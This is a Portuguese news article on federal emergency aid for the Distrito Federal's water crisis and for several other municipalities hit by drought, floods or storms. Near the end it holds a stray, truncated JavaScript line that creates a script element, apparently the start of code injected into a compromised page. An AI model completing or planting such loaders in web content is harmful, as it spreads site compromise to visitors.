GDF terá ajuda federal para combater crise hídrica

Reservatório do Descoberto, que abastece mais da metade dos brasilienses, está com pouco mais de 20% da sua capacidade útil. Foto: Gabriel Jabur/Agência Brasília

A seca que atinge o Distrito Federal chamou atenção do governo Michel Temer. O Ministério da integração Nacional informou nesta sexta-feira (3) que o DF poderá ter acesso a recursos financeiros e materiais de apoio emergencial. As poucas chuvas que caem sobre o DF não têm sido suficientes para aumentar o nível do reservatório da Barragem do Descoberto, que abastece 65% da população.

O governo de Brasília tem tomado medidas como decretar o racionamento de água para a população e situação de emergência no dia 25 de janeiro. A ajuda para enfrentar a crise hídrica também foi estendida aos municípios de Viçosa (AL), Antas (BA), Curaçá (BA), Baixa Grande (BA) e Palmas de Monte Alto (BA), que sofrem com a falta de chuvas.

O acesso aos recursos emergenciais oferecidos pelo governo federal depende da apresentação de um plano detalhado de resposta, que pode ser feito por meio do Sistema Integrado de Informações sobre Desastres (S2ID). O sistema deve ser acessado no site do Ministério da Integração.

Chuvas em excesso

Se em alguns lugares falta água, em outros tem chovido além da conta. O Ministério da Integração também oferece o mesmo apoio financeiro e de materiais aos municípios de Blumenau (SC), onde foi registrado deslizamento de solo; e em Cruzeiro do Sul (AC), Vespasiano (MG), Conselheiro Mairinck (PR), Alfredo Wagner (SC), Laguna (SC), Lauro Muller (SC), Rancho Queimado (SC), que sofrem com chuvas intensas, inundações e enxurradas.

A ajuda também é oferecida ao município de Rosário do Sul (RS), que foi atingido por um forte vendaval, que destruiu várias casas, em janeiro.

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário